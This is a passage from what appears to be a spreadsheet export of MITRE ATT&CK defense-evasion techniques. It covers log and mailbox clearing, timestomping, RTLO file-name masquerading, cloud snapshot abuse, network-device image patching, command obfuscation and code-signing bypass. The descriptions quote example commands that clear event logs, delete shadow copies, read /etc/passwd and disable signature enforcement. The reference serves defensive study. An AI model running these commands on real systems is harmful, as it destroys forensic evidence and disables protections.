* &lt;code&gt;/var/log/utmp&lt;/code&gt; or &lt;code&gt;/var/log/wtmp&lt;/code&gt;: Login records
* &lt;code&gt;/var/log/kern.log&lt;/code&gt;: Kernel logs
* &lt;code&gt;/var/log/cron.log&lt;/code&gt;: Crond logs
* &lt;code&gt;/var/log/maillog&lt;/code&gt;: Mail server logs
* &lt;code&gt;/var/log/httpd/&lt;/code&gt;: Web server access and error logs
</t>
  </si>
  <si>
    <t>T1070.008</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Mailbox Data</t>
  </si>
  <si>
    <t>Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests. 
Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the &lt;code&gt;ExchangePowerShell&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including &lt;code&gt;Remove-MailboxExportRequest&lt;/code&gt; to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called &lt;code&gt;mail&lt;/code&gt;  or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)
Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)</t>
  </si>
  <si>
    <t>T1070.007</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Network Connection History and Configurations</t>
  </si>
  <si>
    <t>Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system and/or in application logs from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.
Network connection history may be stored in various locations. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&lt;/code&gt;
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers&lt;/code&gt;
Windows may also store information about recent RDP connections in files such as &lt;code&gt;C:\Users\\%username%\Documents\Default.rdp&lt;/code&gt; and `C:\Users\%username%\AppData\Local\Microsoft\Terminal
Server Client\Cache\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Malicious network connections may also require changes to third-party applications or network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis.</t>
  </si>
  <si>
    <t>T1070.009</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Persistence</t>
  </si>
  <si>
    <t>Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020)</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>Indicator Removal: Clear Windows Event Logs</t>
  </si>
  <si>
    <t>Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
The event logs can be cleared with the following utility commands:
* &lt;code&gt;wevtutil cl system&lt;/code&gt;
* &lt;code&gt;wevtutil cl application&lt;/code&gt;
* &lt;code&gt;wevtutil cl security&lt;/code&gt;
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command &lt;code&gt;Remove-EventLog -LogName Security&lt;/code&gt; to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>Indicator Removal: File Deletion</t>
  </si>
  <si>
    <t>Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include &lt;code&gt;del&lt;/code&gt; on Windows and &lt;code&gt;rm&lt;/code&gt; or &lt;code&gt;unlink&lt;/code&gt; on Linux and macOS.</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Indicator Removal: Network Share Connection Removal</t>
  </si>
  <si>
    <t>Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)</t>
  </si>
  <si>
    <t>T1070.006</t>
  </si>
  <si>
    <t>Indicator Removal: Timestomp</t>
  </si>
  <si>
    <t>Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)</t>
  </si>
  <si>
    <t>T1036.009</t>
  </si>
  <si>
    <t>Masquerading: Break Process Trees</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may attempt to evade process tree-based analysis by modifying executed malware's parent process ID (PPID). If endpoint protection software leverages the “parent-child" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022) 
On Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware's process tree. For example, adversaries can execute their payload without any arguments, call the `fork()` API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the `init` system process (PID 1), which successfully disconnects the execution of the adversary's payload from its previous process tree.
Another example is using the “daemon” syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) </t>
  </si>
  <si>
    <t>T1036.008</t>
  </si>
  <si>
    <t>Masquerading: Masquerade File Type</t>
  </si>
  <si>
    <t>Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file,  is &lt;code&gt; 0xFF 0xD8&lt;/code&gt; and the file extension is either `.JPE`, `.JPEG` or `.JPG`. 
Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. 
Common non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign.  Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of &lt;code&gt;test.gif&lt;/code&gt;. A user may not know that a file is malicious due to the benign appearance and file extension.
Polygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)</t>
  </si>
  <si>
    <t>T1036.002</t>
  </si>
  <si>
    <t>Masquerading: Right-to-Left Override</t>
  </si>
  <si>
    <t>Adversaries may abuse the right-to-left override (RTLO or RLO) character (U+202E) to disguise a string and/or file name to make it appear benign. RTLO is a non-printing Unicode character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named &lt;code&gt;March 25 \u202Excod.scr&lt;/code&gt; will display as &lt;code&gt;March 25 rcs.docx&lt;/code&gt;. A JavaScript file named &lt;code&gt;photo_high_re\u202Egnp.js&lt;/code&gt; will be displayed as &lt;code&gt;photo_high_resj.png&lt;/code&gt;.(Citation: Infosecinstitute RTLO Technique)
Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)/[Malicious File](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.(Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.</t>
  </si>
  <si>
    <t>T1578.002</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Create Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.</t>
  </si>
  <si>
    <t>T1578.001</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Create Snapshot</t>
  </si>
  <si>
    <t>An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>T1578.003</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Delete Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
An adversary may also [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>T1578.005</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Modify Cloud Compute Configurations</t>
  </si>
  <si>
    <t>Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)</t>
  </si>
  <si>
    <t>T1578.004</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Revert Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)</t>
  </si>
  <si>
    <t>T1601.002</t>
  </si>
  <si>
    <t>Modify System Image: Downgrade System Image</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may install an older version of the operating system of a network device to weaken security.  Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)
On embedded devices, downgrading the version typically only requires replacing the operating system file in storage.  With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart.  The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.
Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600).  Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001).  </t>
  </si>
  <si>
    <t>T1601.001</t>
  </si>
  <si>
    <t>Modify System Image: Patch System Image</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file.  Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.
To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection.  The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.
To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system.  This method typically requires administrative level access to the device.
In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system.  Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory.  This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.
By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599).  Adding new capabilities for the adversary’s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).
Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders.   When this method is used in conjunction with [Downgrade System Image](https://attack.mitre.org/techniques/T1601/002), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system.  By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade. 
When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://attack.mitre.org/techniques/T1542/005). 
When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots.  However, live memory modification of the operating system can be combined with [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) to achieve persistence. </t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Network Boundary Bridging: Network Address Translation Traversal</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)
When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.  In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities</t>
  </si>
  <si>
    <t>T1027.010</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Command Obfuscation</t>
  </si>
  <si>
    <t>Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)
For example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing,  `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`“Wor”+“d.Application”`), order and casing of characters (`rev &lt;&lt;&lt;'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&amp;$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)
Adversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\voi\pcw\..\..\Windows\tei\qs\k\..\..\..\system32\erool\..\wbem\wg\je\..\..\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)
Tools such as &lt;code&gt;Invoke-Obfuscation&lt;/code&gt; and &lt;code&gt;Invoke-DOSfucation&lt;/code&gt; have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)</t>
  </si>
  <si>
    <t>T1027.007</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Dynamic API Resolution</t>
  </si>
  <si>
    <t>Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.
API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)</t>
  </si>
  <si>
    <t>T1027.011</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Fileless Storage</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may store data in "fileless" formats to conceal malicious activity from defenses. Fileless storage can be broadly defined as any format other than a file. Common examples of non-volatile fileless storage include the Windows Registry, event logs, or WMI repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless)
Similar to fileless in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless data storage may remain undetected by anti-virus and other endpoint security tools that can only access specific file formats from disk storage.
Adversaries may use fileless storage to conceal various types of stored data, including payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003)) and collected data not yet exfiltrated from the victim (e.g., [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). Adversaries also often encrypt, encode, splice, or otherwise obfuscate this fileless data when stored.
Some forms of fileless storage activity may indirectly create artifacts in the file system, but in central and otherwise difficult to inspect formats such as the WMI (e.g., `%SystemRoot%\System32\Wbem\Repository`) or Registry (e.g., `%SystemRoot%\System32\Config`) physical files.(Citation: Microsoft Fileless) </t>
  </si>
  <si>
    <t>T1027.005</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.
A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.</t>
  </si>
  <si>
    <t>T1027.012</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: LNK Icon Smuggling</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may smuggle commands to download malicious payloads past content filters by hiding them within otherwise seemingly benign windows shortcut files. Windows shortcut files (.LNK) include many metadata fields, including an icon location field (also known as the `IconEnvironmentDataBlock`) designed to specify the path to an icon file that is to be displayed for the LNK file within a host directory. 
Adversaries may abuse this LNK metadata to download malicious payloads. For example, adversaries have been observed using LNK files as phishing payloads to deliver malware. Once invoked (e.g., [Malicious File](https://attack.mitre.org/techniques/T1204/002)), payloads referenced via external URLs within the LNK icon location field may be downloaded. These files may also then be invoked by [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)/[System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218) arguments within the target path field of the LNK.(Citation: Unprotect Shortcut)(Citation: Booby Trap Shortcut 2017)
LNK Icon Smuggling may also be utilized post compromise, such as malicious scripts executing an LNK on an infected host to download additional malicious payloads. 
</t>
  </si>
  <si>
    <t>T1027.002</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Software Packing</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) 
Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)  </t>
  </si>
  <si>
    <t>T1027.008</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Stripped Payloads</t>
  </si>
  <si>
    <t>Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)
Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)</t>
  </si>
  <si>
    <t>T1553.006</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Code Signing Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. 
Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)
Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt; on Windows and &lt;code&gt;csrutil disable&lt;/code&gt; on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014)
To gain access to kernel memory to modify variables related to signature checks, such as modifying &lt;code&gt;g_CiOptions&lt;/code&gt; to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader)</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
Based on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:
1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.(Citation: OceanLotus for OS X)(Citation: 20 macOS Common Tools and Techniques)
2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.
3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.
4. Notarization - Using the `api.apple-cloudkit.com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.
